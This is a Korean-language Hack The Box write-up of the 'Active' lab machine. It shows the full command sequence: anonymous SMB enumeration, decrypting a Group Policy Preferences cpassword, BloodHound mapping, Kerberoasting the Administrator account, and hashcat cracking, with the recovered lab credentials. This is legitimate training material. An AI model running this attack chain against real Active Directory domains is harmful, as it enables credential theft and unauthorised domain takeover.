Active

meowyeok

HTB|Jul 24, 2026|Last edited: Jul 24, 2026|
 
notion image
 

Reconnaissance

nmap -sV 10.129.15.149
notion image
  • AD 관련된 서비스들이 보인다.
    • 88 : Kerberos (kerberos-sec) 인증 서비스
    • 464 : Kerberos (kpasswd5) 비밀번호 변경
    • 389, 636 (tcpwrapped - LDAPS) : LDAP 디렉토리 서비스
    • 3268, 3269 : Global Catalog
  • 파일공유 및 네트워크 기본서비스
    • 53 : DNS
    • 139 : NetBIOS
    • 445 : SMB
 
nxc smb 10.129.15.149 -u '' -p '' --shares
notion image
  • 주어진 크리덴셜이 없어서 아무것도 없이 anonymous로 시도해보았는데 접근이 가능했다.
  • anonymous 권한으로는 Replication이라는 폴더에 READ 권한이 존재했다.
 
smbclient //10.129.15.149/Replication
notion image
notion image
  • 내부를 열심히 뒤지다보니 \Policies\{GUID}\MACHINE\Preferences\Groups\Groups.xml 이라는 파일을 찾았다.
  • 내부에는 name="active.htb\SVC_TGS", cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" 이런 id와 암호화된 password가 들어가 있었는데 이 cpassword라는 속성은 키가 노출되어 14년도부터는 쓰이지않는 취약점이었다.
  • MS14-025 취약점 : 그룹 정책 기본 설정 취약점으로 인한 권한 상승 취약점 (해시크랙이 가능함)
 

Exploitation

gpp-decrypt cpassword
notion image
  • 이미 유명했던 취약점이라서 gpp-decrypt라는 모듈이 칼리에 내장되어있었다.
  • ( SVC_TGS / GPPstillStandingStrong2k18 )
 
nxc smb 10.129.15.149 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
notion image
notion image
  • SVC_TGS 계쩡에는 밑의 4개 폴더에 모두 READ권한이 존재했고, Users 폴더 내부의 SVC_TGS 유저의 디렉토리로 접근하는데 성공했다.
  • user flag 획득!
 

Privilege Escalation

bloodhound-python -c all -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -d active.htb -ns 10.129.15.149 --zip
notion image
notion image
  • 권한 상승 루트를 찾기위해 블러드하운드로 그래프 분석을 진행했다.
  • ADMINISTRATOR 계정에 SPN이 설정되있는걸 확인하고 Kerberoasting 공격을 시도해봤다.
    • SPN (Service Principal Names) : 어떤 서비스가 어떤 계정으로 돌고있는지 연결해주는 식별자
    • Kerberoasting : 해당 서비스에 TGS 요청을 하면 같은 도메인내의 어떤 계정이라도 해당 SPN에 연결되어있는 계정의 해시값을 리턴해준다. 보통 시스템이 설정한 계정은 랜덤 난수값의 비밀번호를 가지고있어서 크랙이 어렵지만 일반 사용자라면 충분히 크랙될 수 있다. (이게 크랙이 되면 공격 성공)
 
sudo ntpdate 10.129.15.149
faketime '2026-04-06 05:15:14' GetUserSPNs.py active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip 10.129.15.149 -request -outputfile kerb_hashes.txt
notion image
  • CIFS 서비스에 대해 TGS 요청을 했고, 이 서비스는 ADMINISTRATOR가 돌리고있어서 해당 계정의 비밀번호 해시값을 kerb_hashes.txt로 저장하였다.
 
hashcat -m 13100 kerb_hashes.txt /usr/share/wordlists/rockyou.txt
notion image
  • hashcat을 통해 kerb_hashes.txt 크랙에 성공하였다.
  • ( ADMINISTRATOR / Ticketmaster1968 )
 
smbclient -U "ADMINISTRATOR" //10.129.15.149/USERS
notion image
  • root flag 획득!!
Loading...